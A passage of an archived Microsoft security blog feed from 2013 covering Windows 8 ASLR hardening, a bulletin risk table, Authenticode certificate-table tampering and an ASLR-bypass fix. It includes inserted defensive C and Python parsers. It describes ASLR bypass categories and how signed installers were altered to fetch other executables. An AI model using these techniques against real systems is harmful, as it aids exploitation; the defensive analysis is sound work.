Calibri;">EXE images based below 4 GB: 8 bits of entropy (1 in 256 chance of guessing correctly).</span></span></li> </ul> <p><span style="font-size: small;"><span style="font-family: Calibri;">The entropy an image receives depends on its preferred base address, again for compatibility reasons.&nbsp; The Windows kernel currently uses the preferred base address of an image as a hint to decide if the image supports being based above 4 GB.&nbsp; Images that are based below 4 GB may not have been tested in scenarios where they are relocated above 4 GB and therefore may have latent pointer truncation issues.&nbsp; As such, the Windows kernel makes a best-effort attempt to ensure that these images load below 4 GB.&nbsp; Because of these constraints, the vast majority of 64-bit EXEs and DLLs in Windows 8 and Windows 8.1 have been based above 4 GB to ensure that they benefit from the highest possible degrees of entropy. 64-bit images produced by the Visual C++ tool chain also base images above 4 GB by default.</span></span></p> <h1><span style="color: #2e74b5;"><span style="font-family: Calibri Light;">Address Space Information Disclosure Hardening</span></span></h1> <p><span style="font-size: small;"><span style="font-family: Calibri;">The effectiveness of ASLR is inherently dependent on an attacker being unable to discover the location of objects in memory.&nbsp; In some cases, an attacker can leverage a vulnerability in a program to disclose information about the address space layout of a process.&nbsp; For example, an attacker could use a vulnerability to read memory that they would not normally be able to access and thereby discover the address of a DLL in memory.&nbsp; While the mechanics of disclosing address space information are typically dependent on the application and vulnerability that are being exploited, there are some general approaches that attackers have identified.&nbsp; In Windows 8, we have taken steps to eliminate and destabilize known 
address space information disclosure vectors, although these changes have by no means resolved the general problem posed by address space information disclosures.</span></span></p> <h2><span style="font-size: medium;"><span style="color: #2e74b5;"><span style="font-family: Calibri Light;">Image pointers removed from SharedUserData</span></span></span></h2> <p><span style="font-family: Calibri; font-size: small;">Windows uses an internal data structure known as SharedUserData to efficiently communicate certain pieces of information from the kernel to all processes on a system.&nbsp; For efficiency and compatibility reasons, the memory address that SharedUserData is located at is consistent across all processes on a system and across all versions of Windows, including Windows 8 (0x7ffe0000).&nbsp; Since Windows XP Service Pack 2, this memory region has contained pointers into a system DLL (NTDLL.DLL) that have been used to enable efficient system call invocation, among other things.&nbsp; The presence of image pointers at a known-fixed location in memory was noted as being useful in the context of certain types of address space information disclosures.&nbsp; In Windows 8 (and now prior versions with MS13-063 installed), all image pointers have been removed from SharedUserData to mitigate this type of attack. The removal of these pointers effectively mitigated a DEP/ASLR bypass that was later disclosed which affected versions of Windows prior to Windows 8 (involving </span><a href="http://blogs.technet.com/b/srd/archive/2013/08/12/mitigating-the-ldrhotpatchroutine-dep-aslr-bypass-with-ms13-063.aspx"><span style="color: #0563c1; font-family: Calibri; font-size: small;">LdrHotPatchRoutine</span></a><span style="font-size: small;"><span style="font-family: Calibri;">). 
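The Force ASLR and High Entropy Image Randomization sections above all come down to a handful of PE header bits: the /DYNAMICBASE and /HIGHENTROPYVA flags in DllCharacteristics, whether relocations are present and not stripped (which decides whether Force ASLR can move the image at all), and whether the preferred ImageBase sits above 4 GB (the hint the kernel uses before granting the larger entropy). The following C program is an added example, not code from the original post or from Microsoft: it parses those fields directly from the header bytes, so it builds on any platform and needs no Windows API. The sample it checks is a header-only PE32+ image constructed in memory, not a real binary, and the verdict strings, `pe_aslr_check`, `pe_aslr_verdict`, `build_sample_pe64` and `sample_verdict_is` are this example's own names.

```c
/* pe_aslr_check.c: added example, not code from the original post.
 * Parses the PE header bits that decide how Windows 8/8.1 ASLR treats an
 * image. No Windows API is used, so it builds on any platform; the sample
 * image below is constructed in memory and is not a real binary. */
#include <stdint.h>
#include <string.h>

#define IMAGE_FILE_RELOCS_STRIPPED               0x0001  /* COFF Characteristics */
#define IMAGE_FILE_DLL                           0x2000
#define IMAGE_DLLCHARACTERISTICS_HIGH_ENTROPY_VA 0x0020  /* /HIGHENTROPYVA */
#define IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE    0x0040  /* /DYNAMICBASE */
#define DIR_BASERELOC 5                                  /* data directory index */

typedef struct {
    int valid, is_64bit, is_dll;
    int dynamic_base;       /* image opted in to ASLR */
    int high_entropy_va;    /* EXE opted in to 1 TB bottom-up entropy */
    int relocatable;        /* has a base relocation directory, relocs not stripped */
    uint64_t image_base;    /* preferred base; >= 4 GB is the hint the kernel uses */
} pe_aslr_posture;

static uint16_t rd16(const uint8_t *p) { return (uint16_t)(p[0] | p[1] << 8); }
static uint32_t rd32(const uint8_t *p) { return rd16(p) | (uint32_t)rd16(p + 2) << 16; }
static uint64_t rd64(const uint8_t *p) { return rd32(p) | (uint64_t)rd32(p + 4) << 32; }
static void wr16(uint8_t *p, uint16_t v) { p[0] = (uint8_t)v; p[1] = (uint8_t)(v >> 8); }
static void wr32(uint8_t *p, uint32_t v) { wr16(p, (uint16_t)v); wr16(p + 2, (uint16_t)(v >> 16)); }
static void wr64(uint8_t *p, uint64_t v) { wr32(p, (uint32_t)v); wr32(p + 4, (uint32_t)(v >> 32)); }

pe_aslr_posture pe_aslr_check(const uint8_t *img, size_t len)
{
    pe_aslr_posture r;
    memset(&r, 0, sizeof r);
    if (len < 0x40 || img[0] != 'M' || img[1] != 'Z') return r;
    uint32_t pe = rd32(img + 0x3c);
    if ((size_t)pe + 24 > len || memcmp(img + pe, "PE\0\0", 4) != 0) return r;
    const uint8_t *coff = img + pe + 4, *opt = coff + 20;
    uint16_t characteristics = rd16(coff + 18), opt_size = rd16(coff + 16);
    if ((size_t)(opt - img) + opt_size > len) return r;
    uint16_t magic = rd16(opt);
    if (magic == 0x20b) r.is_64bit = 1;
    else if (magic != 0x10b) return r;
    size_t dir_off = r.is_64bit ? 112 : 96;          /* start of the data directories */
    if (opt_size < dir_off) return r;
    r.image_base = r.is_64bit ? rd64(opt + 24) : rd32(opt + 28);
    uint16_t dllchar = rd16(opt + 70);
    uint32_t ndirs = rd32(opt + dir_off - 4), reloc_size = 0;
    if (ndirs > DIR_BASERELOC && dir_off + (size_t)ndirs * 8 <= opt_size)
        reloc_size = rd32(opt + dir_off + DIR_BASERELOC * 8 + 4);
    r.is_dll          = (characteristics & IMAGE_FILE_DLL) != 0;
    r.relocatable     = reloc_size != 0 && !(characteristics & IMAGE_FILE_RELOCS_STRIPPED);
    r.dynamic_base    = (dllchar & IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE) != 0;
    r.high_entropy_va = (dllchar & IMAGE_DLLCHARACTERISTICS_HIGH_ENTROPY_VA) != 0;
    r.valid = 1;
    return r;
}

/* Maps the parsed bits onto the loader behaviour the post describes. */
const char *pe_aslr_verdict(const pe_aslr_posture *p)
{
    if (!p->valid) return "not a PE image";
    if (!p->dynamic_base)
        return p->relocatable
            ? "fixed preferred base; randomized only if the process enables Force ASLR"
            : "fixed preferred base and no relocations; Force ASLR cannot move it";
    if (!p->is_64bit) return "randomized, 32-bit image entropy (8 bits)";
    if (p->image_base < 0x100000000ULL) return "randomized but kept below 4 GB (reduced entropy)";
    if (p->is_dll || p->high_entropy_va) return "randomized above 4 GB with high entropy";
    return "randomized above 4 GB; EXE lacks /HIGHENTROPYVA, so bottom-up allocations stay low-entropy";
}

/* Constructed fixture: a header-only PE32+ image (no sections). Returns bytes written. */
size_t build_sample_pe64(uint8_t *buf, size_t cap, uint16_t characteristics,
                         uint16_t dllchar, uint64_t image_base, uint32_t reloc_size)
{
    size_t need = 0x84 + 20 + 240;           /* "PE\0\0" at 0x80, COFF header, optional header */
    if (cap < need) return 0;
    memset(buf, 0, need);
    buf[0] = 'M'; buf[1] = 'Z';
    wr32(buf + 0x3c, 0x80);                  /* e_lfanew */
    memcpy(buf + 0x80, "PE\0\0", 4);
    uint8_t *coff = buf + 0x84, *opt = coff + 20;
    wr16(coff, 0x8664);                      /* AMD64 */
    wr16(coff + 16, 240);                    /* SizeOfOptionalHeader (PE32+) */
    wr16(coff + 18, characteristics);
    wr16(opt, 0x20b);                        /* PE32+ magic */
    wr64(opt + 24, image_base);
    wr16(opt + 70, dllchar);
    wr32(opt + 108, 16);                     /* NumberOfRvaAndSizes */
    wr32(opt + 112 + DIR_BASERELOC * 8, reloc_size ? 0x3000 : 0);   /* .reloc RVA */
    wr32(opt + 112 + DIR_BASERELOC * 8 + 4, reloc_size);            /* .reloc size */
    return need;
}

/* Builds a sample with the given bits and compares the verdict; 1 on match. */
int sample_verdict_is(uint16_t characteristics, uint16_t dllchar, uint64_t image_base,
                      uint32_t reloc_size, const char *expected)
{
    uint8_t buf[512];
    size_t n = build_sample_pe64(buf, sizeof buf, characteristics, dllchar, image_base, reloc_size);
    pe_aslr_posture p = pe_aslr_check(buf, n);
    return strcmp(pe_aslr_verdict(&p), expected) == 0;
}
```

To audit real binaries, read each file into a buffer and pass it to `pe_aslr_check`; the same bits are what `dumpbin /headers` lists under "DLL characteristics" ("Dynamic base", "High Entropy Virtual Addresses"). Note that the verdicts describe image placement only: a DLL without /DYNAMICBASE still gets moved inside a process that has enabled Force ASLR, which is exactly why the HXDS.DLL case above mattered for Internet Explorer 9 on Windows 7 but not for processes that already force relocation.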
</span></span></p> <h2><span style="font-size: medium;"><span style="color: #2e74b5;"><span style="font-family: Calibri Light;">Predictable fixed memory mappings eliminated</span></span></span></h2> <p><span style="font-size: small;"><span style="font-family: Calibri;">Ensuring that all forms of memory allocation have some base level of entropy has the effect of eliminating what would otherwise be predictable memory mappings in the address space. In some cases, an attacker may be able to leverage a vulnerability to read the contents of arbitrary locations in memory. In these cases, the attacker must be able to predict or discover the address of the object that they wish to read from (typically via heap spraying). The improvements that have been made to ASLR in Windows 8 have made it more difficult for attackers to do this reliably, particularly on 64-bit. As a result, any address space information disclosure that relies on reading from a specified location in memory will generally be more difficult and less reliable on Windows 8. It should be noted, however, that the size of the 32-bit address space places practical constraints on the impact of this, particularly in cases where an attacker is able to fill a large portion of the address space with desired content.</span></span></p> <h2><span style="font-size: medium;"><span style="color: #2e74b5;"><span style="font-family: Calibri Light;">Kernel address space information access restrictions</span></span></span></h2> <p><span style="font-size: small;"><span style="font-family: Calibri;">While the previous sections highlighted improvements that were made to ASLR for user mode applications, we also made investments in Windows 8.1 into hardening the Windows kernel against disclosing kernel address space information to lesser privileged user mode processes. 
The majority of these improvements focused on restricting low integrity processes from accessing certain system and process information classes that intentionally expose kernel address space information. In addition, certain kernel addresses were removed from the shared desktop heap and hypervisor-assisted restrictions were added to limit the exposure of kernel addresses via instructions that can be used to query the GDT/IDT descriptor table base addresses. As a result of these improvements, sandboxed applications such as Internet Explorer 11, Microsoft Office 2013, and Windows Store apps are all prevented from discovering addresses through these interfaces. This means it will be more difficult for attackers to exploit local kernel vulnerabilities as a means of escaping these sandboxes.</span></span></p> <h1><span style="color: #2e74b5;"><span style="font-family: Calibri Light;">Conclusion</span></span></h1> <p><span style="font-size: small;"><span style="font-family: Calibri;">The improvements that have been made to ASLR in Windows 8 and Windows 8.1 have addressed various limitations that attackers have been taking advantage of when exploiting vulnerabilities. As a result of these improvements, we anticipate that attackers will continue to be increasingly reliant on address space information disclosures as a means of bypassing ASLR. 
Forcing attackers to rely on information disclosures has the effect of adding another costly check box to the conditions that attackers need to satisfy when exploiting memory safety vulnerabilities in modern applications.</span></span></p> <p><span style="font-family: Calibri; font-size: small;">- Matt Miller</span></p><div style="clear:both;"></div>Defense-in-depth, mitigation, exploitation, ASLR Assessing risk for the December 2013 security updates http://blogs.technet.com/b/srd/archive/2013/12/10/assessing-risk-for-the-december-2013-security-updates.aspxTue, 10 Dec 2013 18:03:00 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:d4e0026f-727f-49ef-bb6e-6fc3060241deswiat0<p>Today we released eleven security bulletins addressing 24 CVEs. Five bulletins have a maximum severity rating of Critical while the other six have a maximum severity rating of Important. We hope that the table below helps you prioritize the deployment of the updates appropriately for your environment.</p> <table style="width: 350px;" border="1"> <tbody> <tr> <td>Bulletin</td> <td>Most likely attack vector</td> <td>Max Bulletin Severity</td> <td>Max Exploitability Index (XI)</td> <td>Likely first 30 days impact</td> <td>Platform mitigations and key notes</td> </tr> <tr> <td><a href="https://technet.microsoft.com/en-us/security/bulletin/ms13-096">MS13-096</a> <p>(GDI+ TIFF parsing)</p> </td> <td>Victim opens malicious Office document.</td> <td>Critical</td> <td>1</td> <td>Likely to continue seeing Office document attacks leveraging CVE-2013-3906.</td> <td>Addresses vulnerability first described in <a href="https://support.microsoft.com/kb/2896666">Security Advisory 2896666</a>. 
More information about these attacks is in <a href="http://blogs.technet.com/b/srd/archive/2013/11/05/cve-2013-3906-a-graphics-vulnerability-exploited-through-word-documents.aspx">this SRD blog post</a> from November.</td> </tr> <tr> <td> <p><a href="https://technet.microsoft.com/en-us/security/bulletin/ms13-097">MS13-097</a></p> <p>(Internet Explorer)</p> </td> <td>Victim browses to a malicious webpage.</td> <td>Critical</td> <td>1</td> <td>Likely to see reliable exploits developed within next 30 days.</td> <td>Addresses five remote code execution and two elevation of privilege vulnerabilities. The elevation of privilege vulnerabilities could be used by an attacker to elevate out of Internet Explorer&rsquo;s Protected Mode after already achieving code execution within that environment.</td> </tr> <tr> <td> <p><a href="https://technet.microsoft.com/en-us/security/bulletin/ms13-099">MS13-099</a></p> <p>(VBScript)</p> </td> <td>Victim browses to a malicious webpage.</td> <td>Critical</td> <td>1</td> <td>Likely to see reliable exploits developed within next 30 days.</td> <td>Not a vulnerability in the browser directly &ndash; however, the Scripting.Dictionary ActiveX control is on the pre-approved list and is allowed to load without prompt.</td> </tr> <tr> <td> <p><a href="https://technet.microsoft.com/en-us/security/bulletin/ms13-105">MS13-105</a></p> <p>(Exchange)</p> </td> <td>Attacker sends email with malicious attachment and lures victim to view the attachment as a webpage within Outlook Web Access. 
The attacker could potentially compromise the server-side process generating the web page.</td> <td>Critical</td> <td>1</td> <td>Likely to see reliable exploits developed within next 30 days.</td> <td>Addresses Oracle Outside In issues included in the October 2013 security update: <a href="http://www.oracle.com/technetwork/topics/security/cpuoct2013-1899837.html">http://www.oracle.com/technetwork/topics/security/cpuoct2013-1899837.html</a></td> </tr> <tr> <td> <p><a href="https://technet.microsoft.com/en-us/security/bulletin/ms13-098">MS13-098</a></p> <p>(Authenticode)</p> </td> <td>Victim computer infected because user runs / double-clicks a malicious installer that had been signed by a trusted 3rd party and subsequently altered by an attacker to download a malicious executable.</td> <td>Critical</td> <td>1</td> <td>Limited, targeted attacks expected to continue in next 30 days.</td> <td>This issue relies on user first choosing to run a malicious binary. More information on scope of this issue and additional hardening provided by the security update here: <a href="http://blogs.technet.com/b/srd/archive/2013/12/10/ms13-098-update-to-enhance-the-security-of-authenticode.aspx">http://blogs.technet.com/b/srd/archive/2013/12/10/ms13-098-update-to-enhance-the-security-of-authenticode.aspx</a></td> </tr> <tr> <td> <p><a href="https://technet.microsoft.com/en-us/security/bulletin/ms13-100">MS13-100</a></p> <p>(SharePoint)</p> </td> <td>Attacker able to authenticate to vulnerable SharePoint server sends blob of data that is incorrectly de-serialized resulting in potential code execution server-side.</td> <td>Important</td> <td>1</td> <td>Likely to see reliable exploits developed within next 30 days.</td> <td>Successful attack elevates authenticated user to W3WP service account on the SharePoint site.</td> </tr> <tr> <td> <p><a href="https://technet.microsoft.com/en-us/security/bulletin/ms13-101">MS13-101</a></p> <p>(Kernel mode drivers)</p> </td> <td>Attacker running code 
at low privilege runs exploit binary to elevate to SYSTEM.</td> <td>Important</td> <td>1</td> <td>Likely to see reliable exploits developed within next 30 days.</td> <td>Addresses primarily win32k.sys local elevation of privilege vulnerabilities. The font case also being addressed results in denial-of-service only, not code execution.</td> </tr> <tr> <td> <p><a href="https://technet.microsoft.com/en-us/security/bulletin/ms13-102">MS13-102</a></p> <p>(LPC)</p> </td> <td>Attacker running code at low privilege on Windows XP or Windows Server 2003 runs exploit binary to elevate to SYSTEM.</td> <td>Important</td> <td>1</td> <td>Likely to see reliable exploits developed within next 30 days.</td> <td>Does not affect Windows Vista or any later versions of Windows.</td> </tr> <tr> <td> <p><a href="https://technet.microsoft.com/en-us/security/bulletin/ms13-106">MS13-106</a></p> <p>(hxds.dll ASLR mitigation bypass)</p> </td> <td>Attacker combines this vulnerability with a (separate) code execution vulnerability to compromise a system.</td> <td>Important</td> <td>n/a</td> <td>This issue has been leveraged as an exploit component in several real-world browser-based attacks.</td> <td>This vulnerability does not result in code execution directly. However, it is a component attackers use to bypass ASLR. Applying this security update will disrupt a number of in-the-wild exploits even in cases where an update is not applied for a code execution vulnerability.</td> </tr> <tr> <td> <p><a href="https://technet.microsoft.com/en-us/security/bulletin/ms13-104">MS13-104</a></p> <p>(Office)</p> </td> <td>Attacker sends victim a link to malicious server. 
If the victim clicks the link, the browser makes a request to Microsoft&rsquo;s Office 365 server on behalf of the victim in such a way that a user token is captured by the malicious server, allowing the owner of the malicious server to log in to SharePoint Online the same way the victim user would have been able to log in.</td> <td>Important</td> <td>n/a</td> <td>This issue was reported to us by Adallom after they detected targeted attacks leveraging this vulnerability.</td> <td>Affects customers who use Office 2013 to access the Office 365 SharePoint Online multi-tenant service.</td> </tr> <tr> <td> <p><a href="https://technet.microsoft.com/en-us/security/bulletin/ms13-103">MS13-103</a></p> <p>(SignalR)</p> </td> <td>Attacker sends victim a link exploiting a Cross-Site Scripting (XSS) vulnerability on an Intranet Visual Studio Team Foundation Server (TFS) for which they have access rights. If the victim clicks the link, an automatic action is taken on their behalf on the TFS server that they otherwise might not have wanted to execute.</td> <td>Important</td> <td>1</td> <td>Likely to see reliable exploits developed within next 30 days.</td> <td>&nbsp;</td> </tr> </tbody> </table> <p>- Jonathan Ness, MSRC's engineering team</p><div style="clear:both;"></div>Attack Vector, Risk Assessment, Exploitability MS13-098: Update to enhance the security of Authenticodehttp://blogs.technet.com/b/srd/archive/2013/12/10/ms13-098-update-to-enhance-the-security-of-authenticode.aspxTue, 10 Dec 2013 17:20:00 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:2ed5f9d8-4e67-47a8-8df1-2380f8498a6dswiat0<p>Today we released <a href="http://technet.microsoft.com/en-us/security/bulletin/MS13-098">MS13-098</a>, a security update that strengthens the <a href="http://msdn.microsoft.com/en-us/library/windows/hardware/ff686697(v=vs.85).aspx">Authenticode</a> code-signing technology against attempts 
to modify a signed binary without invalidating the signature. This update addresses a specific instance of malicious binary modification that could allow a modified binary to pass the Authenticode signature check. More importantly, it also introduces further hardening to consider a binary &ldquo;unsigned&rdquo; if any modification has been made in a certain portion of the binary. Those improvements to the Authenticode Signature Verification, as described below, require changes from a small but important set of third party application developers, so the new process will not be enabled by default today. Six months from today, on June 10, 2014, binaries will be considered unsigned if they do not conform to the new verification process. If you want to enable the registry key and test the change today, please see the information posted in the <a href="http://technet.microsoft.com/en-us/security/advisory/2915720">security advisory 2915720</a>.</p> <p>We&rsquo;d like to use this blog post to share more about Authenticode and the role of Authenticode in enabling customer confidence while running executables downloaded from the internet.</p> <p><strong>Authenticode and signed binaries</strong></p> <p>Authenticode&reg; is a digital signature format that is used to determine the origin and integrity of software binaries. Authenticode is based on Public-Key Cryptography Standards (PKCS) #7 signed data and X.509 certificates to bind an Authenticode-signed binary to the identity of a software publisher.</p> <p>The idea behind Authenticode is to leverage the reputation of a software developer or company to help customers make a trust decision. If you trust a particular company, you can execute binaries published by that company from any source and media as long as the binary is signed with the company&rsquo;s valid Authenticode signature. The valid Authenticode signature does not guarantee that the software is safe to run. 
However, it does prove that the binary was signed by that particular company and has not been altered afterward. According to the Authenticode Portable Executable format specification, Authenticode signatures can be &ldquo;embedded&rdquo; in a Windows PE file, in a location specified by the Certificate Table entry in the Optional Header Data Directories. When Authenticode is used to sign a Windows PE file, the algorithm that calculates the file's Authenticode hash value excludes certain PE fields. When embedding the signature in the file, the signing process can modify these fields without affecting the file's hash value. These fields are as follows: the checksum, the certificate table RVA, the certificate table size, and the attribute certificate table itself. The certificate table contains a PKCS #7 SignedData structure containing the PE file's hash value, a signature created by the software publisher&rsquo;s private key, and the X.509 v3 certificates that bind the software publisher&rsquo;s signing key to a legal entity. A PKCS #7 SignedData structure can optionally contain:</p> <ul> <li>A description of the software publisher</li> <li>The software publisher's URL</li> <li>An Authenticode timestamp</li> </ul> <p>The following schema illustrates how an Authenticode signature is included in a Windows PE file:</p> <p><a href="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-61-47/8358.authenticode.PNG"><img src="http://blogs.technet.com/resized-image.ashx/__size/550x0/__key/communityserver-blogs-components-weblogfiles/00-00-00-61-47/8358.authenticode.PNG" alt="" border="0" /></a></p> <p>This design ensures that no executable code is omitted from the signature. 
Once the code is authenticated and attributed to an author, everything that code does is the responsibility of the author.</p> <p><strong>Installer programs and Authenticode signatures</strong></p> <p>Downloaders and installers signed with Authenticode require special consideration because they download and execute other executables. As explained above, Authenticode testifies that a particular program&rsquo;s code was signed by the author and that the executable code has not changed since then. If that particular program is designed to download and run a second executable from the network, the original program needs to verify the second executable&rsquo;s integrity with Authenticode or by other means. The developers of a program should pay close attention to guaranteeing the same level of trust and integrity across the full download chain, to ensure that executables downloaded by their installer are also trustworthy and cannot be replaced with a malicious program.</p> <p>Microsoft was informed that a small set of third-party installer programs, signed with a valid Authenticode signature, had been modified to download a different executable than the one they were originally designed to download, without invalidating the installer&rsquo;s Authenticode signature.</p> <p>We analyzed each of these samples to study the execution flow and learn how they worked. First, the code covered by Authenticode is executed from the entry point. Then, this code looks for an overlay inside the file and reads a stream from it. Finally, the code decrypts a URL from the stream and downloads and executes an executable from that URL. The programs unfortunately omitted the integrity check before executing the downloaded file.</p> <p>An overlay is data appended to the physical image of a Portable Executable. Explained simply, if one takes a PE binary and appends additional content to the end without adjusting the header, the result has an overlay. 
This data area is not defined as part of the image by the PE header and therefore isn't part of the virtual image of the loaded PE. The Authenticode verification code verifies that the Attribute Certificate table is the last thing in the file and reports an invalid signature if something is appended after that.</p> <p>In the sample reported to Microsoft, the size of the certificate directory had been increased to cover the overlay. So technically, the certificate directory was the last thing in the file, allowing the test to pass.</p> <p>There are a couple of lessons to learn from this sample:</p> <p>First, the developer stored the URL stream intentionally inside the certificate directory to allow them to sign once and create different installers. This particular sub-optimal practice enabled the malicious binary modification reported to Microsoft. The <a href="http://technet.microsoft.com/en-us/security/bulletin/MS13-098">MS13-098</a> hardening, expected to go into effect June 10, 2014, will consider a binary unsigned in this case going forward.</p> <p>Second, the developer in this particular case was not validating the subsequently downloaded and executed file by any other means.</p> <p>A better way to enable the scenario desired by the developer would have been to store the URL as a resource inside the PE. In doing so, the URL would have been covered by Authenticode and any attempt to modify the download URL would have resulted in a failed signature verification.</p> <p>Today, with <a href="http://technet.microsoft.com/en-us/security/bulletin/MS13-098">MS13-098</a>, as described above, the Windows team has added additional hardening and mitigation in order to detect this kind of bad practice and report an invalid Authenticode signature. When enabled, these hardening measures will detect cases where additional unverified data has been placed after the PKCS #7 blob in the certificate directory of a PE image. 
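</p> <p>The two verification steps described here, the older rule that the certificate table must be the last thing in the file and the MS13-098 rule that nothing but zero padding may follow the PKCS #7 structure, modelled in Python as an added example that is not Microsoft&rsquo;s code. It parses a constructed, headers-only PE32 image in which a placeholder DER SEQUENCE stands in for a real SignedData blob; the function names and the sample URL are assumptions made for this example.</p>

```python
import struct

WIN_CERT_TYPE_PKCS_SIGNED_DATA = 0x0002  # bCertificate holds a PKCS #7 SignedData blob
CERT_TABLE_INDEX = 4                     # IMAGE_DIRECTORY_ENTRY_SECURITY


def der_sequence_length(blob: bytes) -> int:
    """Total encoded size (tag + length + content) of the DER SEQUENCE at blob[0].

    PKCS #7 SignedData is wrapped in a ContentInfo SEQUENCE, so its outer
    length says exactly where the signed structure ends inside the entry.
    """
    if len(blob) < 2 or blob[0] != 0x30:
        raise ValueError("certificate entry does not start with a DER SEQUENCE")
    first = blob[1]
    if first < 0x80:                      # short form: the byte is the length
        return 2 + first
    n = first & 0x7F                      # long form: n following length bytes
    if n == 0 or n > 4 or len(blob) < 2 + n:
        raise ValueError("unsupported or truncated DER length")
    return 2 + n + int.from_bytes(blob[2:2 + n], "big")


def check_certificate_table(pe: bytes) -> dict:
    """Locate the Certificate Table of a PE image and apply both checks.

    legacy_ok   - the certificate table is the last thing in the file, so an
                  appended overlay invalidates the signature
    hardened_ok - the MS13-098 rule: only zero bytes may follow the PKCS #7
                  SignedData structure inside the certificate entry
    """
    def fail(reason, legacy_ok=False):
        return {"legacy_ok": legacy_ok, "hardened_ok": False, "reason": reason}

    if pe[:2] != b"MZ":
        raise ValueError("missing MZ header")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    opt_off = e_lfanew + 4 + 20           # skip "PE\0\0" and the 20-byte COFF header
    magic = struct.unpack_from("<H", pe, opt_off)[0]
    # data directories begin 96 bytes into a PE32 optional header, 112 for PE32+
    dir_off = opt_off + (96 if magic == 0x10B else 112) + CERT_TABLE_INDEX * 8
    cert_off, cert_size = struct.unpack_from("<II", pe, dir_off)  # file offset, not an RVA
    if cert_size == 0:
        return fail("unsigned: no certificate table")
    table_end = cert_off + cert_size
    if table_end > len(pe):
        return fail("certificate table runs past the end of the file")
    if table_end != len(pe):
        return fail(f"{len(pe) - table_end} overlay bytes follow the certificate table")
    dw_length, _revision, cert_type = struct.unpack_from("<IHH", pe, cert_off)
    if cert_type != WIN_CERT_TYPE_PKCS_SIGNED_DATA or dw_length > cert_size:
        return fail("malformed WIN_CERTIFICATE entry", legacy_ok=True)
    blob = pe[cert_off + 8:table_end]     # bytes after the 8-byte WIN_CERTIFICATE header
    signed_len = der_sequence_length(blob)
    if signed_len > len(blob):
        return fail("truncated PKCS #7 structure", legacy_ok=True)
    unverified = sum(1 for b in blob[signed_len:] if b != 0)
    if unverified:
        return fail(f"{unverified} non-zero bytes after the PKCS #7 structure", legacy_ok=True)
    return {"legacy_ok": True, "hardened_ok": True, "reason": "ok"}


def build_sample_pe(extra: bytes = b"") -> bytes:
    """Construct a minimal PE32 image (headers only, not loadable) whose
    certificate table holds a placeholder DER SEQUENCE in place of a real
    PKCS #7 SignedData, followed by `extra` bytes. Constructed test input."""
    placeholder_pkcs7 = bytes.fromhex("3006020101040141")  # SEQUENCE { INTEGER 1, OCTET STRING "A" }
    body = placeholder_pkcs7 + extra
    entry_len = 8 + len(body)
    padded_len = (entry_len + 7) & ~7     # WIN_CERTIFICATE entries are 8-byte aligned
    win_cert = struct.pack("<IHH", padded_len, 0x0200, WIN_CERT_TYPE_PKCS_SIGNED_DATA)
    win_cert += body + b"\0" * (padded_len - entry_len)
    opt_size = 224                        # PE32 optional header with 16 data directories
    cert_off = 64 + 4 + 20 + opt_size     # certificate table placed right after the headers
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 64)           # e_lfanew = 64
    coff = struct.pack("<HHIIIHH", 0x14C, 0, 0, 0, 0, opt_size, 0x0102)
    dirs = [(0, 0)] * 16
    dirs[CERT_TABLE_INDEX] = (cert_off, padded_len)
    opt = struct.pack("<H", 0x10B) + b"\0" * 94                # magic, other fields zeroed
    opt += b"".join(struct.pack("<II", off, size) for off, size in dirs)
    return dos + b"PE\0\0" + coff + opt + win_cert


if __name__ == "__main__":
    samples = {
        "clean": build_sample_pe(),
        # the practice described in the post: a URL stored inside the certificate table
        "url in certificate table": build_sample_pe(b"URL=http://example.invalid/installer2.exe"),
        "overlay appended": build_sample_pe() + b"\x01\x02\x03",
    }
    for label, image in samples.items():
        print(f"{label:26} {check_certificate_table(image)}")
```

<p>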
The check validates that there is no non-zero data beyond the PKCS #7 structure. Although this change prevents one form of this unsafe practice, it is not capable of preventing all such forms; for example, an application developer can place unverified data within the PKCS #7 blob itself, which will not be taken into account when verifying the Authenticode signature. However, as this blog post illustrates, developers are strongly discouraged from doing this, as it can lead to unsafe application behavior and could potentially put the reputation of the signing company at risk if their application makes use of the unverified data in an unsafe way.</p> <p>- Ali Rahbar, MSRC engineering team</p> <p>I would like to thank Jonathan Ness, Elia Florio and Ali Pezeshk.</p> <p>Ref: <a href="http://download.microsoft.com/download/9/c/5/9c5b2167-8017-4bae-9fde-d599bac8184a/Authenticode_PE.docx">http://download.microsoft.com/download/9/c/5/9c5b2167-8017-4bae-9fde-d599bac8184a/Authenticode_PE.docx</a></p><div style="clear:both;"></div> <h1>MS13-106: Farewell to another ASLR bypass</h1> <p><a href="http://blogs.technet.com/b/srd/archive/2013/12/09/ms13-106-another-aslr-bypass-is-gone.aspx">http://blogs.technet.com/b/srd/archive/2013/12/09/ms13-106-another-aslr-bypass-is-gone.aspx</a>, Tue, 10 Dec 2013 04:18:00 GMT, swiat</p> <p style="text-align: justify;">Today we released <a href="http://technet.microsoft.com/en-us/security/bulletin/ms13-106">MS13-106</a>, which resolves a security feature bypass that can allow attackers to circumvent Address Space Layout Randomization (ASLR) using a specific DLL library (HXDS.DLL) provided as part of Microsoft Office 2007 and 2010.</p> <p style="text-align: justify;">The existence of an ASLR bypass does not directly enable the execution of code and does not represent a risk by itself, since this bypass still needs to be used in conjunction with another higher-severity vulnerability that allows remote code execution in order to provide some value to attackers. ASLR is an important mitigation that has been supported since Windows Vista which, when combined with Data Execution Prevention (DEP), makes it <a href="http://blogs.technet.com/b/srd/archive/2010/12/08/on-the-effectiveness-of-dep-and-aslr.aspx">more difficult to exploit memory corruption vulnerabilities</a>.</p> <p style="text-align: justify;">Because ASLR is a generic mitigation aimed at stopping exploitation techniques that apply to many vulnerabilities, attackers are very interested in attempting to find new bypass techniques for it. These bypass techniques typically fall into one of three categories:</p> <ol> <li>Presence of a DLL at runtime that has not been compiled with the /DYNAMICBASE flag (and is therefore loaded at a predictable location in memory).</li> <li>Presence of predictable memory regions or pointers that can be leveraged to execute code or alter program behavior.</li> <li>Leveraging a vulnerability to dynamically disclose memory addresses.</li> </ol> <p style="text-align: justify;">The ASLR bypass that has been addressed by MS13-106 falls into the first category. The difficulty of finding and using an ASLR bypass varies based on the category of the technique. It 